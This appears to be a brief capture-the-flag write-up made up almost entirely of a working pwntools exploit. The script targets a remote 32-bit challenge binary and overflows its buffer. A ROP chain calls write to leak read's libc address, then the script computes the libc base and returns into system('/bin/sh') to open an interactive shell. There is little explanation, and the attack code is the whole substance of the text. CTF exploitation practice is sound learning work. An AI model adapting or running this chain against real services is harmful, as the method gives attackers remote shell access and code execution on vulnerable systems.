Exploit Code

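from pwn import *

# Local testing:
#p = process('./rop')
p = remote('ctf.j0n9hyun.xyz', 3021)

#libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc = ELF('./libc.so.6')
read_offset = libc.symbols['read']
system_offset = libc.symbols['system']
# pwntools on Python 3: search() takes bytes and returns a generator
binsh_offset = next(libc.search(b'/bin/sh'))

# Fixed addresses in the target binary
read_got = 0x804a00c
write_plt = 0x8048340
main = 0x8048470
pppr = 0x8048509  # pop; pop; pop; ret gadget (skips write's 3 arguments)

# Stage 1: write(1, read_got, 4) leaks the resolved address of read,
# then execution returns to main so a second payload can be sent
payload = b'A' * 0x8c  # padding up to the saved return address
payload += p32(write_plt) + p32(pppr) + p32(1) + p32(read_got) + p32(4)
payload += p32(main)

p.send(payload)
read = u32(p.recvn(4))  # recvn blocks until exactly 4 bytes have arrived
libc_base = read - read_offset
log.info("libc base addr : " + hex(libc_base))
system = system_offset + libc_base
binsh = binsh_offset + libc_base

# Stage 2: return into system("/bin/sh"); b'AAAA' is the dummy return address
payload = b'A' * 0x8c
payload += p32(system) + b'AAAA' + p32(binsh)
p.send(payload)

p.interactive()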

Capture the Flag

image
